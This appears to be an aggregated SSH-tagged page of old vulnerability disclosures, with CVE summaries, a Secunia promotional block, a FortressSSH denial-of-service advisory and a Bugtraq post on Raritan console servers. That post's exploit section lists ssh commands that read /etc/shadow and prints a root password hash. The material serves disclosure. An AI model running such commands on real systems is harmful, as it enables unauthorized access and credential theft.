Buffer overflow in Ipswitch WS_FTP Server with SSH 6.1.0.0 allows remote authenticated users to cause a denial of service (crash) and possibly execute arbitrary code via a long opendir command.

Image

Featured Details

**Multiple ways to consume Secunia Research**

Secunia delivers software security research that provides reliable, curated and actionable vulnerability intelligence. Organizations can expect to receive standardized, validated and enriched vulnerability research on a specific version of a software product. Secunia Research supports four solutions:

SVG

**Data Platform**

Data Platform leverages Secunia Research to provide high-level insights based on major or minor versions of software in your normalized inventory

Learn More

SVG

**Flexera One**

Flexera One utilizes Secunia Research (alongside public NVD data) to provide more granular matching of build-level versions of software in your normalized inventory within its IT Asset Management and IT Visibility solutions

Learn More

How it works

**Accurate, reliable vulnerability insights at your fingertips**

The Secunia Research team from Flexera is comprised of several security specialists who conduct vulnerability research in various products in addition to testing, verifying and validating public vulnerability reports. Since its inception in 2002, the goal of the Secunia Research team is to provide the most accurate and reliable source of vulnerability intelligence.

Delivering the world’s best vulnerability intelligence requires skill and passion. Team members continually develop their skills exploring various high-profile closed and open-source software using a variety of approaches, focusing chiefly on thorough code audits and binary analysis. The team has received industry recognition, including naming members to Microsoft’s Most Valuable Security Researchers list.

Secunia researchers discover hard-to-find vulnerabilities that aren’t normally identified with techniques such as fuzzing, and the results have been impressive. Members of the Secunia Research team have discovered critical vulnerabilities in products from vendors including Microsoft, Symantec, IBM, Adobe, RealNetworks, Trend Micro, HP, Blue Coat, Samba, CA, Mozilla and Apple.

The team produces invaluable security advisories based on research of the vulnerabilities affecting any given software update. Sometimes a single update can address multiple vulnerabilities of varying criticalities and threats; but these advisories aggregate and distill findings down to a single advisory perfect for the prioritization of patching efforts within Software Vulnerability Manager. Criticality scores are consistently applied along with details around attack vector and other valuable details within Software Vulnerability Research. Illegitimate vulnerability reports are also investigated and rejected so you can focus only on what truly matters.

CVE-2008-0590: About Secunia Research | Flexera

Pragma FortressSSH 5.0 Build 4 Revision 293 and earlier handles long input to sshd.exe by creating an error-message window and waiting for the administrator to click in this window before terminating the sshd.exe process, which allows remote attackers to cause a denial of service (connection slot exhaustion) via a flood of SSH connections with long data objects, as demonstrated by (1) a long list of keys and (2) a long username.

####################################################################### Luigi Auriemma Application: Pragma FortressSSH http://www.pragmasys.com/FortressSSHServer.asp Versions: <= 5.0 Build 4 Revision 293 Platforms: Windows (note that the effect could be non replicable on Windows Server since depends by how are handled the errors) Bug: Denial of Service Exploitation: remote Date: 02 Jan 2008 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== Pragma FortressSSH is a commercial SSH server for Windows. ####################################################################### ====== 2) Bug ====== The server, which starts a sshd.exe process for each incoming connection, uses the secure \*\_s functions of msvcrt for working on the incoming strings. This method allows the avoiding of buffer-overflow vulnerabilities but the process terminates and shows a message error if an exception occurs. An example is the using of a list of keys longer than 4096 which will raise the exception in vsprintf\_s during the building of the formatted string, while another example is using a long username. Although the termination of a single process doesn't affect the others, the access to the server can be denied through the termination of at least 75 of these processes, after that the server will be unreachable (all the current SSH connections established before the last exception will remain up). This bad effect will finish gradually when the admin clicks on the error messages (for example if he closes the first dialogbox a new connection to the server will be possible) but naturally the attacker can continue the attack keeping the server ever unreacheable. ####################################################################### =========== 3) The Code =========== http://aluigi.org/poc/pragmassh.zip ####################################################################### ====== 4) Fix ====== No fix #######################################################################

CVE-2008-0132

Rule Set Based Access Control (RSBAC) before 1.3.5 does not properly use the Linux Kernel Crypto API for the Linux kernel 2.6.x, which allows context-dependent attackers to bypass authentication controls via unspecified vectors, possibly involving User Management password hashing and unchecked function return codes.

CVE-2007-3945

Raritan Dominion SX (DSX) Console Servers DSX16, DSX32, DSX4, DSX8, and DSXA-48 set (1) world-readable permissions for /etc/shadow and (2) world-writable permissions for /bin/busybox, which allows local users to obtain hashed passwords or execute arbitrary code as other users.

**Bugtraq mailing list archives**

_From_: spam () drwetter org  
_Date_: 28 Jun 2005 17:56:55 -0000  

Hi,

during my research on console servers I've encountered a severe problem on one appliance.

Summary:
Access right escalation / severe permission problems on Raritan Console Servers

Confirmed on DSX32, Software version: 2.4.6
www.raritan.com, more see below

Details:
DSX Raritan Console Servers come with two accounts not having a password. They are "protected" by "exit" in ~/.profile. 
Users normally is not supposed to get access to the underlying Linux.
DES encrypted root passwd is easily retrievable from the network without providing credentials. Also the machine can be 
rendered useless by moving the busybox binary.

Vulnerable Versions:
Vendor Confirmation for DSX16, DSX32, DSX4, DSX8, DSXA-48 (Mips and Intel).


Patches/Workarounds:
After reporting it to Raritan a fix was released:
http://www.raritan.com/support/sup\_upgrades.aspx

Exploit:
%ssh dominion@<ip> ls -l /
\[..shows listing..\]
%ssh dominion@<ip> ls -ln /etc/shadow
-rw-r--r--    1 0     0           360 Jun 28 05:09 /etc/shadow
%ssh dominion@<ip> cat /etc/shadow
root:DX8k7w4C2gJ2g:10933:0:99999:7:::
bin:\*:10933:0:99999:7:::
daemon:\*:10933:0:99999:7:::
adm:\*:10933:0:99999:7:::
lp:\*:10933:0:99999:7:::
sync:\*:10933:0:99999:7:::
shutdown:\*:10933:0:99999:7:::
halt:\*:10933:0:99999:7:::
uucp:\*:10933:0:99999:7:::
operator:\*:10933:0:99999:7:::
nobody:\*:10933:0:99999:7:::
dominion::12962:0:99999:7:::
sshd::12962:0:99999:7:::
%ssh dominion@<ip> cat /etc/passwd | tail -2
dominion:x:500:500:Embedix User,,,:/home/dominion:/bin/sh
sshd:x:501:501:Embedix User,,,:/home/sshd:/bin/sh
%ssh sshd@<ip> ls
indexApp.htm
%ssh sshd@<ip> ls -l /bin/busybox
-rwxrwxrwx    1 root     root        193852 Apr  4  2004 /bin/busybox


-----
Dr. Dirk Wetter                                  http://drwetter.org
Consulting IT-Security + Open Source 
Key fingerprint = 80A2 742B 8195 969C 5FA6  6584 8B6E 59C1 E41B 9153

**Current thread:**

*   **Access right escalation / severe permission problems on Raritan Console Servers** _spam (Jun 28)_

CVE-2005-2136: Bugtraq: Access right escalation / severe permission problems on Raritan Console Servers

The SSH protocol server sshd allows local users without shell access to redirect a TCP connection through a service that uses the standard system password database for authentication, such as POP or FTP.

Tag

#ssh